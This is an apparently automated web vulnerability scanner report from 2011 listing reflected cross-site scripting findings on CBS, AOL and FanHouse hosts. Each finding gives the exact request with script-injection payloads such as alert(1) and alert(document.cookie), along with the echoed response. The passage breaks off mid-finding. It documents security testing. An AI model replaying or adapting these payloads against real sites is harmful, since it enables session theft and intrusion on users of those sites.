/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711dba23*/alert(1)//ccaf888c20c&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default a
...[SNIP]...

1.146. http://mads.cbs.com/mac-ad [PTYPE parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the PTYPE request parameter is copied into the HTML document as plain text between tags. The payload 1857c<a>4edf02830e0 was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=67111857c<a>4edf02830e0&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:35:08 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:35:08 GMT
Content-Length: 599

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=67111857c<a>4edf02830e0&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT M
...[SNIP]...

1.147. http://mads.cbs.com/mac-ad [SITE parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload 37931<a>6c42c321af7 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=16437931<a>6c42c321af7&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:34:07 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:34:07 GMT
Content-Length: 576

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=16437931<a>6c42c321af7&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: C
...[SNIP]...

1.148. http://mads.cbs.com/mac-ad [cookiesOn parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the cookiesOn request parameter is copied into the HTML document as plain text between tags. The payload 177ed<a>5d4faf2f940 was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1177ed<a>5d4faf2f940&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:37:46 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:37:46 GMT
Content-Length: 602

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1177ed<a>5d4faf2f940&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='6711' POS='100' NCAT='1
...[SNIP]...

1.149. http://mads.cbs.com/mac-ad [cookiesOn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the cookiesOn request parameter is copied into a JavaScript inline comment. The payload 89391*/alert(1)//284c42343f2 was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=189391*/alert(1)//284c42343f2&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:35:48 GMT
Server: Apache/2.2
Content-Length: 1146
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:35:48 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=189391*/alert(1)//284c42343f2&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.150. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6ebb1<a>851735ff48a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1&6ebb1<a>851735ff48a=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:40:04 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:40:04 GMT
Content-Length: 606

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1&6ebb1<a>851735ff48a=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='6711' POS='100' NCAT='19650:19806:' CNET-PARTNER-ID='1' DVAR_PSID='' ) TO _RGROUP *//* M
...[SNIP]...

1.151. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload 8e53e*/alert(1)//a041a4ab76d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1&8e53e*/alert(1)//a041a4ab76d=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:37:33 GMT
Server: Apache/2.2
Content-Length: 1156
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:37:33 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1&8e53e*/alert(1)//a041a4ab76d=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.152. http://mads.cbs.com/mac-ad [x-cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the x-cb request parameter is copied into a JavaScript inline comment. The payload e876d*/alert(1)//2d9085e2f91 was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859e876d*/alert(1)//2d9085e2f91&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:36:08 GMT
Server: Apache/2.2
Content-Length: 1147
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:36:08 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859e876d*/alert(1)//2d9085e2f91&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.153. http://mads.cbs.com/mac-ad [x-cb parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the x-cb request parameter is copied into the HTML document as plain text between tags. The payload bca9a<a>70ad7b6acbd was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704bca9a<a>70ad7b6acbd&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:38:32 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:38:32 GMT
Content-Length: 602

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704bca9a<a>70ad7b6acbd&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='6711' POS='100' NCAT='19650:19806:' CNET-PARTNER-ID='1' D
...[SNIP]...

1.154. http://marlothomas.aol.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://marlothomas.aol.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58af7"><script>alert(1)</script>fb0308338b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?58af7"><script>alert(1)</script>fb0308338b0=1 HTTP/1.1
Host: marlothomas.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:22:49 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Mon, 07-Feb-2011 20:22:49 GMT; path=/
Keep-Alive: timeout=5, max=999824
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 58041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://marlothomas.aol.com/?58af7"><script>alert(1)</script>fb0308338b0=1" />
...[SNIP]...

1.155. http://mlb.fanhouse.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.fanhouse.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 885e5"-alert(1)-"db05883e06a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?885e5"-alert(1)-"db05883e06a=1 HTTP/1.1
Host: mlb.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:22:58 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999768
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 91018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
,fanhouse.com,mmafighting.com,mmafighting.net,sports.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="MLB";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://mlb.fanhouse.com/?885e5"-alert(1)-"db05883e06a=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.156. http://money.aol.com/reflector/setCookie [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.aol.com
Path:   /reflector/setCookie

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 54f8b<script>alert(1)</script>5358b4f3ab0 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /reflector/setCookie?cb=54f8b<script>alert(1)</script>5358b4f3ab0& HTTP/1.1
Host: money.aol.com
Proxy-Connection: keep-alive
Referer: http://o.aolcdn.com/os/money/flash/DailyFinanceCookieProxy.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; s_pers=%20s_getnr%3D1297021680436-New%7C1360093680436%3B%20s_nrgvo%3DNew%7C1360093680440%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:47:20 GMT
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=UTF-8
Content-Length: 45

54f8b<script>alert(1)</script>5358b4f3ab0({})

1.157. http://motorsports.fanhouse.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://motorsports.fanhouse.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b54b2"-alert(1)-"03ff745aee2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?b54b2"-alert(1)-"03ff745aee2=1 HTTP/1.1
Host: motorsports.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:06 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999880
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 64191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
afighting.com,mmafighting.net,sports.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="Motorsports";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://motorsports.fanhouse.com/?b54b2"-alert(1)-"03ff745aee2=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.158. http://movies.aol.com/trailers/main.adp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://movies.aol.com
Path:   /trailers/main.adp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fce3a"%3b1a4d966ae1a was submitted in the REST URL parameter 1. This input was echoed as fce3a";1a4d966ae1a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /trailersfce3a"%3b1a4d966ae1a/main.adp HTTP/1.1
Host: movies.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2334772668.1997950285.1031800576; path=/
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:23:09 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 44419
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head
...[SNIP]...
<!--
s_265.server="acp-ld29.websys.aol.com";
s_265.mmxgo=true;
s_265.pageName="mov: Page Not Found!";
s_265.channel="us.movies";
s_265.trackExternalLinks="true";
s_265.prop1="trailersfce3a";1a4d966ae1a";
s_265.pfxID="mov";
s_265.disablepihost=false;
s_265.prop2="main.adp";
s_265.linkInternalFilters="javascript:,aol.com,moviefone.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

1.159. http://nba.fanhouse.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nba.fanhouse.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0eec"-alert(1)-"5808854bd27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

